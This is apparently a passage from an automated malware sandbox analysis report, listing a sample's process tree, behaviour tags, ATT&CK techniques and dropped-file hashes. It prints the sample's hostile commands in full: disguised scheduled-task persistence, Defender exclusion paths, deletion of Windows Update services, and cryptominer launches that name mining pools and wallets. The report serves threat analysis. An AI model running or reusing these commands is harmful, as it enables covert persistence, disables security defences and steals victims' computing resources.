C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 668
3⤵
- Program crash
PID:2120

C:\Users\Admin\AppData\Local\Temp\3EA1.exe
C:\Users\Admin\AppData\Local\Temp\3EA1.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
3⤵
PID:5112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
4⤵
- DcRat
- Creates scheduled task(s)
PID:2876

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:80 -u 48KAmnwZUxBRbm4hKTpM1x6ucn4UqmdBwaojP5ka3kVWfpHEXRvLHq1NuE1s4R4yWRS663yNRe2EKZNXk96cJHL51BaXhga -R --variant=-1 --max-cpu-usage=40 --donate-level=1 -opencl --pass neweramining
3⤵
PID:1340

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.shaxta -p x -t 6
3⤵
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\4691.exe
C:\Users\Admin\AppData\Local\Temp\4691.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664

C:\Users\Admin\AppData\Local\Temp\tmp8A58.tmpf7g57uyun0yo.exe
"C:\Users\Admin\AppData\Local\Temp\tmp8A58.tmpf7g57uyun0yo.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:1092

C:\Users\Admin\AppData\Local\Temp\tmp8A59.tmptr11blxmizw.exe
"C:\Users\Admin\AppData\Local\Temp\tmp8A59.tmptr11blxmizw.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCBEB.tmp.bat""
4⤵
- Suspicious use of WriteProcessMemory
PID:4228

C:\Windows\system32\timeout.exe
timeout 4
5⤵
- Delays execution with timeout.exe
PID:1596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /f /sc MINUTE /mo 5 /tn "API Infrastructure v1.21" /tr "'C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe"'
5⤵
- DcRat
- Creates scheduled task(s)
PID:2844

C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe
"C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe"
5⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2496

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3556

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:960

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:4616

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:2756

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:2228

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:2656

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:3668

C:\Windows\explorer.exe
C:\Windows\explorer.exe
2⤵
PID:380

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
2⤵
PID:1660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4292

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4288

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1892

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4116

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2468

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:4820

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2612

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3864

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:3764

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1476

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#weslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }
2⤵
PID:3856

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate
3⤵
PID:2584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Modifies data under HKEY_USERS
PID:4172

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4104

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4496

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2796

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1272

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2488

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1508

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4996

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:5000

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1112

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:2628

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qoghxdvgd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }
2⤵
PID:4868

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:1844

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:1892

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ufwnctgi
2⤵
PID:4748

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
PID:2184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe nfwhyehyzpwozpzk 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
2⤵
PID:4224

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:656

C:\Users\Admin\AppData\Roaming\iheawvb
C:\Users\Admin\AppData\Roaming\iheawvb
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3608 -ip 3608
1⤵
PID:5024

C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3860

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
Filesize
7.6MB

MD5
8e9fe0d0efafefa00a222ddee017327a

SHA1
602bf696e8533ff030193435d09ccc0c964871a7

SHA256
9b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b

SHA512
523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4

Download Submit
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe
Filesize
7.6MB

MD5
8e9fe0d0efafefa00a222ddee017327a

SHA1
602bf696e8533ff030193435d09ccc0c964871a7

SHA256
9b4a1011466da15c2ef7ad0a1f462b7903d3c8158c16b0c67c3e75ef992e979b

SHA512
523564c29a8a4c4c5d227039d7f647d9874ed7dd40e08dfcd4628045d3193f3061606a7790c8ff238a403773118e8cae2fa7dfed2271293d8c72082421d127c4

Download Submit
C:\ProgramData\AppVirtualBoxHelp\URRERK.exe
Filesize
303.0MB

MD5
e6e7681d7e32ca1dc8ff2d54ef6d1272

SHA1
b8a3bae973878ced0c99670d1865eb1a04780093

SHA256
8500f5ddd02b9252cee94b8e7a947679888dd31559e51cddfebb3ecd999633a0

SHA512
8a9478a26afec173f1b855debc7d04d54a6e3973dd69905339d3ba6eb8732842d26ac8079fcf040cba890d1ae5c70dc859e7d88835581c0bdfb845765d4e8713

Download Submit
C:\Users\Admin\AppData\Local\API Infrastructure v1.21\APIInfrastructure.exe
Filesize
36KB

MD5
1830de40a67d611bef5a49baf0b59877

SHA1
ba582cfcf2509af03ff6a3d4a1969b33fba39394

SHA256
37991ba2aa1e7695429dbf4e0a9e89bf0a008317025de4bc37ce41c190e2cde4

SHA512
28151b66a463264aa8f35036397300d30cccb3832fca65398467f851050c9ca865bff0c57a262afa38f38f284058065f5e3f5fab0dd9513f47c00d5fc99b080e

Download Submit
